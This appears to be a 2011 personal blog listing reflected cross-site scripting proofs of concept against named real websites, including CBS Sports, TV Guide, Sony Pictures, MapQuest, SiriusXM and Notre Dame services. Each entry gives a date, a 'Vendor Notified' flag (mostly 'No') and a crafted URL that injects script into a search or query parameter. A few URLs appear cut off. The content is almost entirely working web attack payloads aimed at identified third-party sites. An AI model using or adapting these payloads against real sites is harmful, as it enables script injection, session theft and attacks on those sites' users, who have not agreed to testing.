benburns.org

Mailinator.com

Ben Burns — Thu, 29 Dec 2011 18:57:06 +0000

Date: Dec-29-2011
Vendor Notified: No
Proof of Concept:
http://www.mailinator.com/maildir.jsp?email=-->

University of Notre Dame

Ben Burns — Sun, 25 Sep 2011 17:45:29 +0000

Date: Sept-25-2011
Vendor Notified: No
Proof of Concept:
https://apps.nd.edu/webdirectory/directory.cfm?cn=

University of Notre Dame WebFile

Ben Burns — Sun, 25 Sep 2011 17:41:25 +0000

Date: Sept-25-2011
Vendor Notified: No
Proof of Concept:
https://webfile.nd.edu/~/apps/webfile

Note:
After hitting the URL, go back to the webfile login (https://webfile.nd.edu) and use any dummy login credentials. Previous XSS will be present and spark an internal server error.

CBS Sports

Ben Burns — Sun, 21 Aug 2011 02:33:37 +0000

Date: Aug-20-2011
Vendor Notified: No
Proof of Concept:
http://www.cbssports.com/info/search#q=//";//\";//-->">'>

AddictingGames

Ben Burns — Sun, 21 Aug 2011 02:20:02 +0000

Date: Aug-20-2011
Vendor Notified: No
Proof of Concept:
http://www.addictinggames.com/static/php/game/searchPage.php?pageAction=search&text=%3C/script%3E%3Cscript%3Ealert%280%29;%3C/script%3E

TV Guide

Ben Burns — Thu, 18 Aug 2011 04:58:14 +0000

Date: Aug-18-2011
Vendor Notified: No
Proof of Concept:
http://www.tvguide.com/search/index.aspx?keyword=%22%3E%3Cscript%3Ealert%28%270%27%29;%3C/script%3E

Sony Pictures

Ben Burns — Thu, 18 Aug 2011 04:42:23 +0000

Date: Aug-18-2011
Vendor Notified: No
Proof of Concept:
http://search.sonypictures.com/search?q=%22;alert%280%29//&proxystylesheet=sp-us&site=sp-us

MapQuest

Ben Burns — Wed, 27 Jul 2011 03:49:03 +0000

Date: Jul-26-2011
Vendor Notified: Yes
Proof of Concept:
http://web.sa.mapquest.com/wendys/advantage.adp?template=en_search_error&postalCode=\%27;alert(0)//

SiriusXM Satellite Radio

Ben Burns — Mon, 25 Jul 2011 03:47:53 +0000

Date: Jul-24-2011
Vendor Notified: No
Proof of Concept:
http://www.siriusxm.com/servlet/Satellite?c=SXM_Channel_C&childpagename=SXM%2FSXM_Channel_C%2FChannelDetail&cid=--%3E%3Cscript%3Ealert(%270%27);%3C/script%3E&pagename=SXM%2FWrapper

HLTV.org

Ben Burns — Sun, 08 May 2011 03:46:20 +0000

Date: May-07-2011
Vendor Notified: No
Proof of Concept:
http://www.hltv.org/?pageid=198&search=1&teams=%3C/script%3E%22%3E%27%3E%3Cscript%3Ealert(String.fromCharCode(88,83,83))%3C/script%3E